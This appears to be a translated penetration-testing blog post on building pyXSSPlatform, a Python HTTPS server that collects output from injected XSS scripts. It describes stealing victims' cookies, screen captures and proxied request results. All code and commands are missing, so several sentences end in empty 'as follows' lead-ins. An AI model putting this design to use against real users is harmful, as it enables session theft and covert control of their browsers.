Penetration Tool Development - Command Line Implementation of XSS Platform

0x00 Preface

---

Using an XSS platform facilitates testing of XSS vulnerabilities and obtaining critical information. Currently, there are many available online XSS platforms, and one can also attempt to build their own XSS platform.

However, if the test target cannot access external networks, we need to set up a lightweight XSS platform within the internal network, which must be easy to install and support cross-platform compatibility.

I have not yet found a suitable open-source tool, so I plan to write a command-line tool using Python to provide the functionality of an XSS platform.

0x01 Introduction

---

This article will cover the following topics:

• Design Approach
• Implementation Details
• Open Source Code

0x02 Design Approach

---

Following the XSS platform model, the command-line tool needs to provide the following functionalities:

1. Create an HTTPS server to provide web services

2. Distinguish different types of data, extract key content, and save it

3. Modularize functions for easy secondary development

0x03 Implementation Details

---

1. Create an HTTPS server to provide web services

First, create a certificate. You can use openssl with the following command:

Generate the certificate file https_svr_key.pem

Python3 test code for creating an HTTPS server:

The above code will create a WEB server supporting HTTPS protocol, with functionality similar to python -m SimpleHTTPServer 8000

2. Distinguish different data, extract key content and save

Need to customize the processing module RequestHandler to handle GET and POST packets

The code for handling GET packets is as follows:

Among these, print(self.headers) is used to output the Header content of the GET request, which can be used to identify the user's browser

To obtain user cookies, a custom format is adopted here. If the GET request address contains the string 'cookie', the request content is saved as a file to store the acquired user cookies.

The code for processing POST packets is as follows:

The above code will uniformly reply with the text content "Success" and a status code of 200 for POST packets.

It evaluates the address of the POST request, corresponding to the following three functions respectively:

(1) Save user screen capture

Request address is /screen

Extract image data from POST request parameters, perform Base64 decoding, and save

(2) Control user to send HTTP data packets to a specified address and save the returned result

Request address is /data

Extract data from POST request parameters and save

(3) Default functionality

Command line output of POST request parameters

Note:

When extracting data content for the above three functionalities, decoding with urllib.parse.unquote() is required

3. Modular functionality for easy secondary development

The default access address for the XSS platform is: https:///index.js

After creating the HTTPS server, you only need to edit index.js in the same directory as the Python script

The following describes the functionalities implemented by these two js scripts:

(1) Retrieve user cookies

To read user cookies, use document.cookie

When returning cookie data, to avoid cross-origin issues, you can use the Image object. Example code is as follows:

Using the Image object only allows sending GET requests, cannot obtain response content, and can only determine whether there is a response through onerror and onload events

(2) Sending HTTP requests via JavaScript

HTTP requests support GET and POST, and also need to distinguish between synchronous and asynchronous methods

For synchronous methods, once the call starts, the caller must wait until the method call returns before proceeding with subsequent actions. To send the request result back to the server, you can obtain the return result of the data packet via return and then transmit it back

For asynchronous methods, once the call starts, the method call returns immediately. To send the request result back to the server, this can be achieved through a callback function

A simple understanding of the callback function: a function can be called as a parameter in another function

For example, the following code:

After executing the code, 1 will be output to the console

In summary, to send a GET data packet to a specified URL and return the request result to the server, two methods can be used:

Method 1: Synchronous method

Method 2: Asynchronous Method + Callback Function

Note:

Adding the parameter "?t=" + Math.random() when sending the request is to prevent receiving cached pages from the server.

For Chrome browser, when sending HTTP requests for cross-origin access, Chrome will indicate that the request is blocked by the CORS policy, but this does not affect the sending and receiving of data.

0x04 Open Source Code

---

The complete code has been open-sourced, with the address as follows:

An open-source project

pyXSSPlatform can be run directly from the command line and supports the following three functions:

• GetCookie, obtains user cookies and saves them as .txt files
• CaptureScreen, captures the user's screen and saves it as a .png file
• GET/POST, controls the user to send HTTP data packets to a specified address, with results saved as .html files

Usage:

(1) Generate a self-signed certificate using openssl, command example:

(2) Edit the file index.js

Fill in the JS code to be loaded, code templates can refer to files in Payload_Template

(3) Start the WEB server, command example:

At this point, the startup address of the XSS platform is as follows:

https://192.168.1.1/index.js

You can modify index.js at any time to control users to execute different functions

0x05 Summary

---

This article introduces the method of building an HTTPS server with Python and implementing an XSS platform via command line, using the open-source tool pyXSSPlatform. It is easy to operate, supports cross-platform running, and allows for secondary development.